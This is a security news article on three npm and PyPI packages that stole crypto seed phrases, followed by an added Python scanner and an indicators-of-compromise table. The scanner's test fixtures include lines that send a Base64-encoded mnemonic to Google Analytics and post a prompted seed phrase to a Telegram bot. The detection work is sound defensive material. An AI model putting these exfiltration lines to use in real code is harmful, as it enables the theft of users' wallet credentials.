Threat Actors Leverage npm and PyPI with Impersonated Dev Tools for Credential Theft
The Socket Threat Research Team has unearthed a trio of malicious packages, two hosted on the Python Package Index (PyPI) and one on the npm registry, designed to silently pilfer cryptocurrency secrets, including mnemonic seed phrases and private keys.
Released between 2021 and 2024, these packages, under the guise of harmless developer tools, have been downloaded thousands of times, showcasing a growing trend in software supply chain attacks targeting open-source ecosystems.
Subtle Subversion in Open Source
The npm package react-native-scrollpageviewtest, masquerading as a page-scrolling helper, has been downloaded 1215 times.
Its modus operandi involves an intricate combination of obfuscation and evasion techniques.
Once installed, it dynamically loads the host React Native wallet engine to extract sensitive data, which is then encoded in Base64 and stealthily exfiltrated to the control server using Google Analytics as a seemingly innocuous endpoint for data transmission.
This method not only evades detection but also leverages the trust placed in Google’s analytics services.
On PyPI, web3x and herewalletbot represent similar tactics but with nuanced delivery mechanisms.
Web3x, appearing as an Ethereum balance checker, has gained over 3400 downloads.
It tricks users into providing their seed phrases by offering to check wallet balances and subsequently sends the stolen credentials to a Telegram bot controlled by the attackers.
Herewalletbot, with 3425 downloads, automates the process even further by guiding users through a Telegram chat interface where they are prompted to enter their mnemonic seed phrase, which is then harvested without their knowledge.
The Deceptive Dance with Developers
According to the report, these packages illustrate the sophistication and cunning of current cyber threats.
By embedding themselves into development tools and workflows, they position themselves to intercept the most sensitive information, leveraging the inherent trust developers place in open-source packages.
This breach not only compromises individual developers but poses systemic risks to organizations relying on these ecosystems for software development.
That these packages remained available on npm and PyPI until recently highlights a critical need for stronger security controls within the software supply chain.
Developers and organizations must adopt proactive security measures like source-code review, runtime behavior monitoring, and dependency analysis to safeguard against such threats.
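The exfiltration pattern described above (credential access, Base64 encoding, and an analytics or Telegram endpoint as the outbound channel) lends itself to the kind of source-code review heuristic the previous paragraph calls for. The following is an added example, not code from Socket or from the packages discussed: a small Python scanner that flags a source file only when a credential-access indicator co-occurs with an exfiltration channel, so ordinary analytics or Base64 usage on its own is not reported. All three fixtures are constructed for the example; the function names inside them (`getMnemonic`, `walletModuleName`, `<BOT_TOKEN>`) are placeholders, not identifiers from the real packages.

```python
"""Heuristic static scan for the wallet-credential-theft pattern described in the report.

Added example, not code from Socket or the article. Each indicator below is common
in legitimate code on its own; a finding is produced only for the combination the
report describes: access to a seed phrase or private key paired with an outbound
channel (Google Analytics or Telegram), optionally with Base64 encoding in between.
"""
import re

# Indicator name -> regex, applied line by line.
INDICATORS = {
    "credential_access": re.compile(r"mnemonic|seed\s*phrase|private\s*key", re.I),
    "base64_encode": re.compile(r"toString\(\s*['\"]base64['\"]\s*\)|\bbtoa\(|b64encode\("),
    "analytics_endpoint": re.compile(r"google-analytics\.com", re.I),
    "telegram_endpoint": re.compile(r"telegram\.org", re.I),
    # require() with a bare identifier instead of a string literal, i.e. a module
    # chosen at run time rather than declared in the source.
    "dynamic_require": re.compile(r"\brequire\(\s*[A-Za-z_$][\w$]*\s*\)"),
}

# Indicators that represent a channel out of the host.
EXFIL_CHANNELS = {"analytics_endpoint", "telegram_endpoint"}


def scan_source(source: str) -> dict:
    """Return a verdict ('suspicious', 'review' or 'clean') plus per-indicator line numbers."""
    hits: dict[str, list[int]] = {}
    for lineno, line in enumerate(source.splitlines(), start=1):
        for name, pattern in INDICATORS.items():
            if pattern.search(line):
                hits.setdefault(name, []).append(lineno)

    found = set(hits)
    channels = found & EXFIL_CHANNELS
    if "credential_access" in found and channels:
        verdict = "suspicious"
        reason = "credential access paired with outbound channel: " + ", ".join(sorted(channels))
    elif "credential_access" in found and "base64_encode" in found:
        verdict = "review"
        reason = "credential access paired with encoding; check where the encoded data goes"
    else:
        verdict = "clean"
        reason = "no credential-access indicator, or no pairing with an exfiltration channel"
    return {"verdict": verdict, "reason": reason, "hits": hits}


# Constructed fixture modelled on the npm behaviour in the report: dynamic load of a
# wallet module, Base64 encoding, Google Analytics as the channel. Names are placeholders.
SAMPLE_SCROLL_HELPER_JS = """\
const engine = require(walletModuleName);
const words = engine.getMnemonic();
const blob = Buffer.from(words.join(' ')).toString('base64');
fetch('https://www.google-analytics.com/collect?v=1&t=event&el=' + blob);
"""

# Constructed fixture modelled on the PyPI balance-checker lure: a prompt for the
# seed phrase, then a Telegram bot as the channel. <BOT_TOKEN> is a placeholder.
SAMPLE_BALANCE_CHECKER_PY = """\
phrase = input("Paste your 12-word seed phrase to check the balance: ")
requests.post("https://api.telegram.org/bot<BOT_TOKEN>/sendMessage", data={"text": phrase})
"""

# Constructed benign fixture: page-view analytics and a Base64 image data URI, with
# no credential access, so the scanner should not flag it.
SAMPLE_BENIGN_JS = """\
fetch('https://www.google-analytics.com/collect?v=1&t=pageview&dp=%2Fhome');
const dataUri = 'data:image/png;base64,' + Buffer.from(png).toString('base64');
"""

if __name__ == "__main__":
    for label, src in [
        ("scroll-helper fixture", SAMPLE_SCROLL_HELPER_JS),
        ("balance-checker fixture", SAMPLE_BALANCE_CHECKER_PY),
        ("benign fixture", SAMPLE_BENIGN_JS),
    ]:
        result = scan_source(src)
        print(f"{label}: {result['verdict']} ({result['reason']}) hits={result['hits']}")
```

The scoring deliberately requires a pairing: a lone `google-analytics.com` string or a lone `toString('base64')` is how plenty of honest front-end code looks, and flagging those alone would bury reviewers in noise. In practice this sort of check runs over the unpacked tarball or wheel of each new dependency as part of dependency analysis, and anything reported as `suspicious` or `review` is read by a human before the package is allowed into a build.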
This discovery serves as a stark reminder of the critical importance of vigilance in software component usage.
Developers are urged to never share their mnemonic seed phrase and private keys under any circumstances, as these are the keys to their digital assets.
Any package requesting such information should be immediately flagged as suspicious and reported.
Indicators of Compromise (IOCs)
| Malicious Package | Alias | Downloads | Email/Endpoint |
|---|---|---|---|
| react-native-scrollpageviewtest | twoplus | 1,215 | twoplusten@163[.]com |
| web3x | tonymevbots | 3,405 | xeallmail@mitico[.]org |
| herewalletbot | vannszs | 3,425 | bevansatria@gmail[.]com, @herewalletbot, hxxps://web[.]telegram[.]org/k/#@herewalletbot |